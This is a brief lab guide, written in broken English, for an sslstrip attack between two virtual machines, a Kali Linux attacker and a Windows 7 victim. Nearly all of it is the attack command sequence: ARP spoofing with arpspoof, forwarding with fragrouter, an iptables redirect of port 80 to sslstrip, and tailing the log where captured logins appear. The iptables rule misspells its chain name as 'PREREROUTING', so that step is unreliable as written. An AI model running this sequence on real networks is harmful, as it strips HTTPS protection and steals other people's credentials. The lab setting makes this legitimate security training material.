This document is lap step for test sslstrip. We have need two virtual machines on Vmware Workstation for this lap complete.
For one system as victim and for another system as attacker.
Name of Role |
IP / Mask |
Gateway |
DNS |
Victim |
192.168.0.31 |
192.168.0.1 |
8.8.8.8 |
Attacker |
192.168.0.33 |
192.168.0.1 |
8.8.8.8 |
Attacker (Kali Linux) |
Verity the gateway address # route -n
Rerouting after arp spoofing # fragrouter -B1
Open the new terminal Redirect from tcp 80 to tcp 10000 # iptables -t nat -A PREREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
ARP spoofing # arpspoof -i eth0 192.168.0.31 192.168.0.1
Opne another new terminal # python /usr/share/sslstrip/sslstrip.py -l 10000
# tail -f sslstrip.log
|
Victim (Windows 7) |
You should do login. |